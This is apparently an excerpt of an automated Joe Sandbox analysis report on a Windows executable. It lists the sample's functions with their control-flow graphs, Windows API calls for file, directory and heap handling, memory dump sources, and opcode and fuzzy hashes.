                                                                                                            control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 160 140005da1-140005dbb 159->160 161 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->161 168 140005dbd-140005dc9 160->168 284 140005d96-140005d9b 161->284 175 140005e7f-140005e99 168->175 176 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 168->176 184 140005e9b-140005ea7 175->184 176->168 176->175 192 140005f5d-140005f77 184->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 184->193 201 140005f79-140005f85 192->201 193->184 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->159 284->160 432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2499486723-0
                                                                                                            • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                                                                            • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                                                                            • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                                                                            • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10
                                                                                                            Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointermemmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 2366752189-0
                                                                                                            • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                                                                            • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                                                                            • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                                                                            • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50
                                                                                                            Function 0000000140001000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                                                              • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                                                              • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                                                              • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                                                              • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                                                              • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                                                              • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                                                              • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                                                              • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                                                              • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                                                              • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                                                              • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                                                              • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                                                              • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                                                              • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                                                              • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                                                              • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                                                              • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                                                              • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                                                              • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                                                              • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                                                              • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                                                              • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                                                              • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                                                              • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                                                              • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                                                                            • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                                                                            • ExitProcess.KERNEL32 ref: 0000000140001258
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                                                                            • String ID: 0V
                                                                                                            • API String ID: 1207063833-2748129481
                                                                                                            • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                                                                            • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                                                                            • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                                                                            • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22
                                                                                                            Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67filememoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 581 14000e3f0-14000e404 582 14000e4f3-14000e4fd 581->582 583 14000e40a-14000e40e 581->583 583->582 584 14000e414-14000e418 583->584 585 14000e483-14000e4a6 call 14000e770 584->585 586 14000e41a-14000e423 584->586 593 14000e4a8-14000e4b5 585->593 594 14000e4ee 585->594 588 14000e451-14000e45b 586->588 589 14000e425 586->589 588->588 590 14000e45d-14000e482 WriteFile 588->590 592 14000e430-14000e43a 589->592 592->592 595 14000e43c-14000e450 call 14000e620 592->595 596 14000e4c5-14000e4d6 WriteFile 593->596 597 14000e4b7-14000e4ba call 14000e620 593->597 594->582 600 14000e4dc-14000e4e8 HeapFree 596->600 602 14000e4bf-14000e4c3 597->602 600->594 602->600
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 74418370-0
                                                                                                            • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                                                                            • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                                                                            • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                                                                            • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
                                                                                                            Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 603 14000d914-14000d922 604 14000d924-14000d95a wcsncpy wcslen 603->604 605 14000d99e 603->605 606 14000d98a-14000d99c CreateDirectoryW 604->606 607 14000d95c-14000d96b 604->607 608 14000d9a0-14000d9a8 605->608 606->608 607->606 609 14000d96d-14000d97b 607->609 609->606 610 14000d97d-14000d988 609->610 610->606 610->607
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectorywcslenwcsncpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 961886536-0
                                                                                                            • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                                                                            • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                                                                            • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                                                                            • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14
                                                                                                            Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 611 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CommonControlsInitInitializememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2179856907-0
                                                                                                            • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                                                                            • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                                                                            • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                                                                            • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
                                                                                                            Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$Value
                                                                                                            • String ID:
                                                                                                            • API String ID: 3898337583-0
                                                                                                            • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                                                                            • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                                                                            • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                                                                            • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00
                                                                                                            Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CodeExitProcess
                                                                                                            • String ID: open
                                                                                                            • API String ID: 3861947596-2758837156
                                                                                                            • Opcode ID: 4cf6f5f02477868f662f0c04b5321cd13397de582ab68467988eee586df03510
                                                                                                            • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                                                                            • Opcode Fuzzy Hash: 4cf6f5f02477868f662f0c04b5321cd13397de582ab68467988eee586df03510
                                                                                                            • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40
                                                                                                            Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                                                                            • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                                                              • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                                                              • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                                                              • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 547990026-0
                                                                                                            • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                                                                            • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                                                                            • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                                                                            • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                                                                            Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHandlerVectored$Remove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3670940754-0
                                                                                                            • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                                                                            • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                                                                            • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                                                                            • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348
                                                                                                            Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 668 14000da6c-14000da80 670 14000da82-14000da85 668->670 671 14000da9f 668->671 673 14000da92-14000da9d DeleteFileW 670->673 674 14000da87-14000da8c SetFileAttributesW 670->674 672 14000daa1-14000daa6 671->672 673->672 674->673
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesDelete
                                                                                                            • String ID:
                                                                                                            • API String ID: 2910425767-0
                                                                                                            • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                                                                            • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                                                                            • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                                                                            • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                                                                            Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 675 140012060-140012090 HeapCreate TlsAlloc call 140012bf0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$CreateValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 493873155-0
                                                                                                            • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                                                                            • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                                                                            • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                                                                            • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                                                                            Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DestroyFreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3293292866-0
                                                                                                            • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                                                                            • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                                                                            • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                                                                            • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                                                                            Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
